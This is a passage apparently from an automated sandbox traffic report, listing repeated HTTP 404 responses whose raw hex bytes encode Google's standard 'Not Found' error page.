63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 